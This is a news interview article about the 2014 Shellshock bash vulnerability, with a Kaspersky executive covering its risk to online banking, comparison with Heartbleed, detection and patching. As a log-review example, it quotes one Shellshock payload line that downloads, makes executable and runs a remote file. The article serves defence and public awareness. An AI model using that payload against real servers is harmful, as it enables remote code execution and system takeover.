Live
- BJP Tamil Nadu President Expresses Confidence In Resolving Tungsten Mining Concerns In Madurai
- Karnataka Reviews Lake Safety Ahead of Monsoon: Minister Bhosaraju Tells Upper House
- Udupi MP’s queries, More key highways on high-priority
- Investing in Skills: Education Loans Paving the Way for Career Success
- Ghaggar river’s two stretches identified as polluted: Govt
- ICC chief Jay Shah meets Brisbane 2032 Olympics organising committee CEO
- Oxford Grammar High School Celebrates 44th Annual Sports Day with Grandeur
- Indian banking sector’s health remains robust, govt policy working very well: Top bankers
- iOS 18.2 Unveiled: New Features with ChatGPT Integration Revolutionize Your iPhone
- 'Run for Viksit Rajasthan' to be annual event, says CM Sharma
Shellshocked Bug threat to online banking
This vulnerability is being actively exploited to target servers hosted on the Internet. Even some workstations running Linux and OSX are vulnerable, but an attacker would still need to find an attack vector that will work remotely against your desktop.
As we are aware both Shellshocked and Bashbugs are one and the same vulnerability.
Mr. Altaf Halde, Managing Director, Kaspersky Lab – South Asia has answered some of the critical questions which have come up due to this bug.
Is there threat to online banking?
This vulnerability is being actively exploited to target servers hosted on the Internet. Even some workstations running Linux and OSX are vulnerable, but an attacker would still need to find an attack vector that will work remotely against your desktop.
Proof of concept targeting *nix workstation dhcp clients has been released, but most workstation dhcp process policies prevent actions from this sort of exploit by default.
Exploit attempts that we observed are targeting server vulnerabilities and downloading DDoS bots for further DDoS attacks. It is likely that servers hosting PII and handling sensitive merchant data are being attacked as well, but we have not yet observed it. There are merchants that unfortunately do not patch quickly.
How serious is the threat?
This bug is very dangerous indeed, but not EVERY system is vulnerable. Special conditions must be met for a web server to be exploited. One of the biggest problems now is that when patches are published, researchers will look for other ways to exploit bash, explore different conditions that enable it to be exploited, etc.
So a patch that helps prevent remote code execution can't do anything against, for example, a file overwrite. So there will probably be a series of patches and in the meantime systems are still vulnerable.
Is it the new Heartbleed?
Well, it's much easier for a cybercriminal to exploit than Heartbleed. Also, in the case of Heartbleed, a cybercriminal could only steal data from memory, hoping to find something interesting. By contrast, the bash vulnerability makes full system control much more possible. So it would seem to be more dangerous.
Can it be used in future APT attacks?
It could be used for future malware development, of course. Malware could be used to automatically test infrastructure for such a bug, to infect the system or attack it in some other way.
Can I detect if someone has exploited this against me?
We would recommend reviewing your HTTP logs and check if there is anything suspicious. An example of a malicious pattern:
.jpg)
192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"
There are also some patches for bash that log every command that is being passed to the bash interpreter. This is a good way to see if someone has exploited your machine. It won't prevent someone from exploiting this vulnerability, but it will log the attackers actions on the system.
Advice on how to fix this problem
The first thing that you need to do is to update your bash version. Different Linux distributions are offering patches for this vulnerability; and although not all patches have been proven to be completely effective, patching is the first thing to do. Services like Heroku pushed out fixes that will auto-apply within 24 hours, but developers can force the updates too.
If you are using any IDS/IPS I would also recommend that you add/load a signature for this. A lot of public rules have been published.
Also review your webserver configuration. If there are any CGI scripts that you are not using, consider disabling them.
The opinions expressed in this article are those of the author and do not necessarily reflect the views of our organisation.
